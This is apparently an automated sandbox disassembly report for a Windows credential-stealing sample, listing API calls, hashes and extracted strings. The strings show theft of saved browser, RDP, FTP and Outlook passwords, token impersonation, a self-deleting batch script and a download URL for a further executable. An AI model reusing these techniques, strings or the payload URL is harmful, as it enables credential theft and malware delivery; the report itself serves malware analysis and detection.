                                        • Instruction ID: d9b658f99edcf380480679d0380fbda1e3de7f606a045d53a7d20716763285dc
                                        • Opcode Fuzzy Hash: 5e419986c46963edbd489a6238c02946ee884d372549de3b54a9c74f0383bbfc
                                        • Instruction Fuzzy Hash: 80314FB1501209BADF11AB21CD02FEE7779AF20308F1441BBB95CB50F1DA7D8E909B59
                                        APIs
                                        • lstrlenA.KERNEL32(00000000), ref: 0040D1A0
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040D206
                                        • LocalFree.KERNEL32(00000000), ref: 0040D22D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                        • String ID: full address:s:$password 51:b:$username:s:
                                        • API String ID: 2920030623-2945746679
                                        • Opcode ID: f8c0bd1dde0fd01f25be36c8954f39aa40b6f21269f9b9dc6824445267d337d6
                                        • Instruction ID: 521d8c06d8872df347c5d21da1874a82d467e8718c9d5b1a6a76fae600a3ffa9
                                        • Opcode Fuzzy Hash: f8c0bd1dde0fd01f25be36c8954f39aa40b6f21269f9b9dc6824445267d337d6
                                        • Instruction Fuzzy Hash: 7F414632C00209EADF119BE1DC06BEEBB75AF48318F14403BE200751E1DB794A9ADB5D
                                        APIs
                                        • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040ACA1
                                        • lstrlenW.KERNEL32(00415D0E,?,?,00000000), ref: 0040ACDF
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AD0F
                                        • LocalFree.KERNEL32(00000000), ref: 0040AD41
                                        • CredFree.ADVAPI32(00000000), ref: 0040AD5F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                        • String ID: Microsoft_WinInet_*
                                        • API String ID: 3891647360-439986189
                                        • Opcode ID: 80a2e83370bb61d3e19e57fd98beae2e73b7afe73c6cb1f283b32fdf871d3c92
                                        • Instruction ID: 5a812cee58d32793c44ab0004d8813f03de0939113520eef2f9af034efdbf5f1
                                        • Opcode Fuzzy Hash: 80a2e83370bb61d3e19e57fd98beae2e73b7afe73c6cb1f283b32fdf871d3c92
                                        • Instruction Fuzzy Hash: 32311B72900308EFEF218B90ED09BEEB6B5AF44305F148036E511766D0D7B89AD4CB5A
                                        APIs
                                        • CreateProcessAsUserA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00000000,00000044,?), ref: 00402F74
                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 00402FA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateExecuteProcessShellUser
                                        • String ID: D$open
                                        • API String ID: 1679197209-2491301029
                                        • Opcode ID: 91e888894ed81a06755e49cf0cbee73dd2f00fa8b12ff89b241d646b47462b6b
                                        • Instruction ID: 65e519f15533edacccbcc2ab68badd36ae88e9590d8298b26916f8c6ed4c30e5
                                        • Opcode Fuzzy Hash: 91e888894ed81a06755e49cf0cbee73dd2f00fa8b12ff89b241d646b47462b6b
                                        • Instruction Fuzzy Hash: 8A211D7164020ABADF218B90DE0AFDE7778AB04748F248033B645B90E4D6FC9584EA1D
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 0040ADFB
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AEB3
                                        • LocalFree.KERNEL32(00000000), ref: 0040AEE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                        • String ID:
                                        • API String ID: 2920030623-0
                                        • Opcode ID: 78f9f08e1e700f00362d5cadeb092079dea6affe507255d9df67910bbce9b11d
                                        • Instruction ID: 7f55c2bfa634a7279b01034aebd702cef864f94d93bc03b295f81b45b5ad80e3
                                        • Opcode Fuzzy Hash: 78f9f08e1e700f00362d5cadeb092079dea6affe507255d9df67910bbce9b11d
                                        • Instruction Fuzzy Hash: 7D31D8776802049BEF209E54D844BCEB765FB95364F104033DA55B76C0D37C9A92CB9E
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004047B1
                                        • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 004047CD
                                        • FreeSid.ADVAPI32(?), ref: 004047E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: 157f16b5c99da2e5783f292e44723cf0196ef30e0fdd4ace4729c8b1f3548b16
                                        • Instruction ID: abac0aabba2ae30627f2129dd6e041b3ede074dbb1d9b92be2e54af79a61d022
                                        • Opcode Fuzzy Hash: 157f16b5c99da2e5783f292e44723cf0196ef30e0fdd4ace4729c8b1f3548b16
                                        • Instruction Fuzzy Hash: 6E114475500248EEEB21CB94DC0DFDA7BF4AB51308F0981B5E210AB2E1D3B99504C79A
                                        APIs
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004046A8
                                        • LocalFree.KERNEL32(00000000), ref: 004046DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptDataFreeLocalUnprotect
                                        • String ID:
                                        • API String ID: 1561624719-0
                                        • Opcode ID: 5e4ebc9361cf310c78c26b4b80c41da4300d9c464cd2556beeb3ffdc08145257
                                        • Instruction ID: 318e217419bb7282489a1e580f81bcf2f6dc81518ad431105c03e2b5713db43c
                                        • Opcode Fuzzy Hash: 5e4ebc9361cf310c78c26b4b80c41da4300d9c464cd2556beeb3ffdc08145257
                                        • Instruction Fuzzy Hash: 13115875A00208EFDF11CF84DC44BDEBBB5FB86314F008466FA11A62D0D379AAA0DB08
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                        • Instruction ID: 04253af852c3278be08785016eb7e3b26d9b4c395a195d52766f27199939e121
                                        • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                        • Instruction Fuzzy Hash: 3F121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f70be72155e2526db8c1e7dbc10a3005bf4209f57955f8871c74e262be628f48
                                        • Instruction ID: ce438fbf563cf6f26a374f6d561d24e4a1be7fc4629f7ef1e808023105cd1412
                                        • Opcode Fuzzy Hash: f70be72155e2526db8c1e7dbc10a3005bf4209f57955f8871c74e262be628f48
                                        • Instruction Fuzzy Hash: 4861B337F5163647E7588DAA8881155E6D2ABCC320B5F827ECD19F7381CDB4BD2296C0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904351309.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_pbfe2Xcxue.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
                                        • Instruction ID: c6fb4472ec26e85fa1c8c8aca1d449e3f648b4c8b454689518c0d7dc9ede3b66
                                        • Opcode Fuzzy Hash: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
                                        • Instruction Fuzzy Hash: 4241B172200244AFDB109F66CC85F6AB7A9FF84725F24444EF9158B252C7B9EC91CBA4
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004103E6
                                        • wsprintfA.USER32 ref: 004103F4
                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,004103CD), ref: 00410454
                                        • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,004103CD), ref: 0041046A
                                        • lstrcatA.KERNEL32(?,?,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,004103CD), ref: 0041047E
                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410497
                                        • lstrcpyA.KERNEL32(?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105), ref: 004104AE
                                        • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 004104BA
                                        • lstrcpyA.KERNEL32(00000001,?,?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?), ref: 004104C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CountCreateModuleNamePathTempTicklstrcatwsprintf
                                        • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                        • API String ID: 2870328670-4169620016
                                        • Opcode ID: bc4a84f3c79fc088101333317eff76f951033d0f3722a173f47c29d31a4e7109
                                        • Instruction ID: d047cccf33d8b6249167d395b1d836bd11eb755a4d2d83d42c56bb33dc461b47
                                        • Opcode Fuzzy Hash: bc4a84f3c79fc088101333317eff76f951033d0f3722a173f47c29d31a4e7109
                                        • Instruction Fuzzy Hash: A141C331B442097ADF15A6A18C13FEF76B39F84708F24903A7215F52E1EEB84ED05A0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                        • API String ID: 0-1526611526
                                        • Opcode ID: 15eca6765337e5dbe521305a86aba0f03b7c7552e8fa8c44529bf1a24b9a32b0
                                        • Instruction ID: 93701582a0e738582e076d95c04e7b9293532f617e131564ee79239b97e002b4
                                        • Opcode Fuzzy Hash: 15eca6765337e5dbe521305a86aba0f03b7c7552e8fa8c44529bf1a24b9a32b0
                                        • Instruction Fuzzy Hash: C2911AB1910209EADF11AFA1DC46BEEBAB5AF50348F24403BF510712E2DBBD4D91DB49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                        • API String ID: 0-3560805513
                                        • Opcode ID: bf1a5b346e0b5851dd3d60449c78aea0bee617b5f8a4116a6bd3a9277b936cdf
                                        • Instruction ID: 819d801392f7f2c03d8ed66ffee3a92d490c7424c6f8ce20a5c7add59ca4406b
                                        • Opcode Fuzzy Hash: bf1a5b346e0b5851dd3d60449c78aea0bee617b5f8a4116a6bd3a9277b936cdf
                                        • Instruction Fuzzy Hash: 5E513AB2950609FACF12ABA1CC06FEE7A75AF50348F104037B511B01E3D7BE5E919A5E
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • wsprintfA.USER32 ref: 0040AF6C
                                        • wsprintfA.USER32 ref: 0040AF7F
                                        • wsprintfA.USER32 ref: 0040AF92
                                        • wsprintfA.USER32 ref: 0040AFA5
                                        • wsprintfA.USER32 ref: 0040AFB8
                                        • wsprintfA.USER32 ref: 0040AFCB
                                        • wsprintfA.USER32 ref: 0040AFDE
                                          • Part of subcall function 0040ADE6: lstrlenA.KERNEL32(?), ref: 0040ADFB
                                          • Part of subcall function 0040ADE6: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AEB3
                                          • Part of subcall function 0040ADE6: LocalFree.KERNEL32(00000000), ref: 0040AEE6
                                          • Part of subcall function 00401607: lstrlenA.KERNEL32(00000000), ref: 00401613
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                        • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                        • API String ID: 3846021373-1012938452
                                        • Opcode ID: e6ddd78442a7d5679f5a79908b51626f7bc0ab21b36978d8341d3767f9999034
                                        • Instruction ID: ec75fdc38d62598d673409a4c557277a03b196ef0f2ab6bcbb324378cde69565
                                        • Opcode Fuzzy Hash: e6ddd78442a7d5679f5a79908b51626f7bc0ab21b36978d8341d3767f9999034
                                        • Instruction Fuzzy Hash: 6F61A871C00209FEDF027F91DC46AEEBA72AF44309F14803AF525741B1DB7A5AA1EB59
                                        APIs
                                          • Part of subcall function 0040A56D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5A6
                                          • Part of subcall function 0040A56D: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5AF
                                          • Part of subcall function 0040A5B8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5F4
                                          • Part of subcall function 0040A5B8: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5FD
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F874
                                        • lstrcmpiA.KERNEL32(?,identification), ref: 0040F8F4
                                        • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F909
                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F92C
                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F94B
                                        • lstrcmpiA.KERNEL32(?,identities), ref: 0040F96A
                                        • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F9CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                        • API String ID: 636431001-4287852900
                                        • Opcode ID: 8222add923bd94231785fff68a27126ec6d8d0e5261508529484e0c94f16043a
                                        • Instruction ID: ef99616cb550d235511d0aaa4f60c4db959e7ed6b17d95e35f342bc68d9e3db5
                                        • Opcode Fuzzy Hash: 8222add923bd94231785fff68a27126ec6d8d0e5261508529484e0c94f16043a
                                        • Instruction Fuzzy Hash: AC41377180021DBAEF219F50CD42FDA7B79BF05344F1041BAB608B50A1DB799AD9DF98
                                        APIs
                                          • Part of subcall function 004017C4: GetHGlobalFromStream.OLE32(?,?), ref: 004017D1
                                          • Part of subcall function 004017C4: GlobalLock.KERNEL32(?), ref: 004017E8
                                          • Part of subcall function 004017C4: GlobalUnlock.KERNEL32(?), ref: 00401800
                                        • wsprintfA.USER32 ref: 00410238
                                        • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002,00000000), ref: 004102AB
                                        • GetTickCount.KERNEL32 ref: 004102C3
                                        • wsprintfA.USER32 ref: 004102D5
                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 004102E6
                                        • lstrlenA.KERNEL32(true,?,00000000), ref: 0041034E
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Globallstrlen$wsprintf$CountCreateDirectoryFromLockPathStreamTempTickUnlocklstrcatlstrcpy
                                        • String ID: %02X$%d.exe$MZ$http://ftp.pexgol.com/bm6dog.exe$true
                                        • API String ID: 3085755050-2362385145
                                        • Opcode ID: c9be3085c6284c3a26056f5f745d2a80ecda3ebf2f5b3b6c2def87ebc081daa1
                                        • Instruction ID: cb83405144a39d33bbd8e6bda30171cce61964e4e6f46ecba385d9df42b6d904
                                        • Opcode Fuzzy Hash: c9be3085c6284c3a26056f5f745d2a80ecda3ebf2f5b3b6c2def87ebc081daa1
                                        • Instruction Fuzzy Hash: 37412E72800218AADF20AB61CC4ABEEB7B99B15305F1041F7B958B11E1DABD4FC4CF58
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403508
                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403533
                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 0040357A
                                        • ObtainUserAgentString.URLMON(00000000,?,00002000), ref: 00403597
                                        • wsprintfA.USER32 ref: 004035B1
                                        • wsprintfA.USER32 ref: 004035CE
                                        • lstrlenA.KERNEL32(?,00002000,00002000,00002000), ref: 004035F1
                                        • closesocket.WSOCK32(?,?,00002000,00002000,00002000), ref: 0040361B
                                        Strings
                                        • GET %s HTTP/1.0Host: %sAccept-Language: en-USAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: %s, xrefs: 004035A9, 004035C6
                                        • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 004035BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlen
                                        • String ID: GET %s HTTP/1.0Host: %sAccept-Language: en-USAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: %s$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
                                        • API String ID: 1473867801-577339357
                                        • Opcode ID: 91bdcfba5857ec0c211edceb1081f740dd30d4d899aef2bcd2e10ecfd0b883a9
                                        • Instruction ID: 9777c4ed4c5b2ee9316af053b9d13fa9bd4ac9f8c942a2f3ec3f1b1e4d0d9db1
                                        • Opcode Fuzzy Hash: 91bdcfba5857ec0c211edceb1081f740dd30d4d899aef2bcd2e10ecfd0b883a9
                                        • Instruction Fuzzy Hash: BF510A72D04209FAEF11AFD1CC42BEDBE79AF0430AF10403AF511B52A1D7B95A52DB19
                                        APIs
                                        • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402DD9
                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402DFD
                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402E27
                                        • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402E43
                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402E50
                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E71
                                        • CloseHandle.KERNEL32(?), ref: 00402EA2
                                        • CloseHandle.KERNEL32(?,?), ref: 00402EAA
                                        • CloseHandle.KERNEL32(?), ref: 00402EB4
                                        • Process32Next.KERNEL32(?,00000128), ref: 00402EC6
                                        • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402ED6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                        • String ID: explorer.exe
                                        • API String ID: 3144406365-3187896405
                                        • Opcode ID: 08f40fb6d44563ca32729fa00ebbfbd7ada4dea461e43912d0a36bf701304b82
                                        • Instruction ID: a2c78e65942944609eb9e6a2c921facc2d1892735b8c183ce11cefcb4c4c06b2
                                        • Opcode Fuzzy Hash: 08f40fb6d44563ca32729fa00ebbfbd7ada4dea461e43912d0a36bf701304b82
                                        • Instruction Fuzzy Hash: 85218032A40119EBDF229B90CD49BEE7674AF04304F1440B3A608F51D1D7B89ED0DF98
                                        APIs
                                          • Part of subcall function 0040294B: lstrlenA.KERNEL32(?), ref: 0040297F
                                        • StrStrIA.SHLWAPI(?,00415E66), ref: 0040BD0E
